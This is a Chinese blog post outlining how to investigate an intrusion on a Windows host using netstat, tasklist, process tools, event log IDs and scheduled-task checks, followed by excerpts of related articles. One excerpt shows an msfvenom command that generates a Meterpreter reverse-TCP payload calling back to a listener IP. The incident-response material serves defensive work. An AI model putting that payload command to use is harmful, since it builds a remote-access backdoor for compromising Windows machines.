Windows主机入侵分析思路

一、如何找到恶意文件

  1. 检查网络连接 netstat -ano,如有恶意对外连接需要注意哦,特别是挖矿、对外暴力破解。
  2. 根据PID找到进程

tasklist | findstr "$PID" 或 wmic process get name,executablepath,processid | findstr $PID

$PID为可以进程的PID号

  1. 找到恶意文件

(1)利用任务管理器和CMD命令行手工找恶意文件

  • 任务管理器 taskmgr
  • 服务 services.msc

(2)进程分析神器PC Hunter (www.xuetr.com ) 没有发布方签名的、名字/路径异常的都可能是可以进程
(3)进程分析神器Process Explore https://technet.microsoft.com/en-us/sysinternals/bb896653/
(4)简单粗暴:360安全卫士木马全盘查杀

关于PC Hunter和Process Explore,我会在其他篇章中具体介绍。

  1. 找到可以文件后将其上传到木马鉴别网站

二、日志分析

1.windows自带日志管理器:eventvwr
2.日志分析神器splunk

  • 查找关键时间点是否存在爆破登录记录
  • 是否存在异地异常成功登录记录
  • 确认远程登录账户是否存在弱口令

Event ID:4722创建用户
Event ID:4624RDP登录成功
Event ID:7045注册为windows服务

关于windows登录成功的日志和借助Splunk分析将会在其他篇章中介绍。

三、其他辅助手段

1.查看用户 net user
2.检测否是弱密码 https://password.kaspersky.com/
3.性能监视器 perfmon.msc
4.资源监视器 resmon.exe
5.注册表 regedit.exe
6.组策略 gpedit.msc
7.Wndows更新检查

  • 2008:控制面板\所有控制面板项\Windows Update
  • 2012:控制面板\所有控制面板项\Windows 更新\查看更新历史记录"

8.查看计划任务

a) Windows server 2008 运行at
b) Windows server 2012 运行schtasks.exe

9.云服务商一般都会提供态势感知服务,借助IDS/WAF/安全防护日志辅助分析

原文地址:http://blog.51cto.com/winhe/2116654

时间: 2024-10-18 06:03:59

Windows主机入侵分析思路的相关文章

windows入侵排查思路

0x00 前言 当企业发生黑客入侵.系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失. 常见的应急响应事件分类: web入侵:网页挂马.主页篡改.Webshell 系统入侵:病毒木马.勒索软件.远控后门 网络攻击:DDOS攻击.DNS劫持.ARP欺骗 针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些Window服务器入侵排

windows应急响应入侵排查思路

0x00 前言 ? 当企业发生黑客入侵.系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失. 常见的应急响应事件分类: web入侵:网页挂马.主页篡改.Webshell 系统入侵:病毒木马.勒索软件.远控后门 网络攻击:DDOS攻击.DNS劫持.ARP欺骗 针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些Window服务器入

反弹入侵(几乎适用于任何windows主机)((请勿用于非法操作!!!))

[email protected]:~# msfvenom -pwindows/meterpreter/reverse_tcp lhost=192.168.1.117 lport=1234 --format=exe> /root/attack.exe No platform was selected, choosingMsf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from

Linux应急响应入侵排查思路

0x00 前言 ? 当企业发生黑客入侵.系统崩溃或其它影响业务正常运行的安全事件时,急需第一时间进行处理,使企业的网络信息系统在最短时间内恢复正常工作,进一步查找入侵来源,还原入侵事故过程,同时给出解决方案与防范措施,为企业挽回或减少经济损失. 针对常见的攻击事件,结合工作中应急响应事件分析和解决的方法,总结了一些Linux服务器入侵排查的思路. 0x01 入侵排查思路 一.账号安全 基本使用: 1.用户信息文件/etc/passwdroot:x:0:0:root:/root:/bin/bash

第一次OllyDbg逆向记录(分析思路和注意点&其他文章)

OllyDbg 操作菜单栏.工具栏.快捷键 C++调用加强 目录 OllyDbg 操作菜单栏.工具栏.快捷键    1 一.    载入观察    1 1.静态载入观察:    1 2.OD动态观察    1 二.    初步尝试下断查找目标    1 1.如何下断    1 2.接下来有两个选择:    1 2.1手动F9运行目标    1 2.2设条件断点    1 2.3 CALL调用时堆栈小解    1 3.初步断点目标 (条件触发情况)    1 三.调用栈回溯    1 1.回溯到无

性能瓶颈分析思路

性能瓶颈分析思路 性能分析是一个大课题,不同的架构.不同的应用场景.不同的程序语言分析的方法各有差异,抽象一下大致分为二类: 自底向上:通过监控硬件及操作系统性能指标(CPU.内存.磁盘.网络等硬件资源的性能指标)来分析性能问题(配置.程序等的问题).因为用户请求最终是由计算机硬件设备来完成的,做事的是 CPU. 自顶向下:通过生成负载来观察被测试的系统性能,比如响应时间.吞吐量:然后从请求起点由外及里一层一层的分析,从而找到性能问题所在. 不管是自底向上还是自顶向下,关键点就是生成负载.监控性

Nagios利用NSClient++监控Windows主机

一.简介 1.获取更多的NSClient原理,请参考NSClient++官方站点 NSClient++官网:http://www.nsclient.org/ 2.NSClient++与NRPE NSClient++的工作原理 NRPE的工作原理 Nagios对Windows主机的监控主要有三种方法 第一种是NSclient++ 第二种是NRPE 第三种是SNMP(不是很常用) NSclient++与nrpe最大的区别就是: 1.被监控机上安装有nrpe,并且还有插件,最终的监控是由这些插件来进行

虚拟机和windows主机中的文件共享

22:54 2015/12/22 虚拟机和windows主机中的文件共享:特别推荐:我的一个老师特别推荐的方法:在windows安装SSH Secure File Transfer Client,直接点开,有两个左右窗口,通过虚拟机的ip连接虚拟机,就可以直接在窗口中进行复制粘贴了.其他方式:参考:http://jingyan.baidu.com/article/676629974979c654d51b84f8.htmlarm-linux-gcc搭建过程图解: Ubuntu 12.04嵌入式交叉

Nagios利用NSClient++监控Windows主机(4)

在Nagios的libexec下有check_nt这个插件,它就是用来检查windows机器的服务的.其功能类似于check_nrpe.不过还需要搭配另外一个软件NSClient++,它则类似于NRPE.我们需要下载NSClient合适的版本,然后安装在被监控的windows主机上. Overview of NRPE NSClient++的原理如下图: 可以看到NSClient与nrpe最大的区别就是: NRPE: 被监控机上安装有nrpe,并且还有插件,最终的监控是由这些插件来进行的.当监控主